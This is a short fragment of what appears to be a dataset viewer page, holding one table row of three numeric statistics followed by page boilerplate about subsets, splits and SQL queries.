| 29.440678 | 248 | 0.731721 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.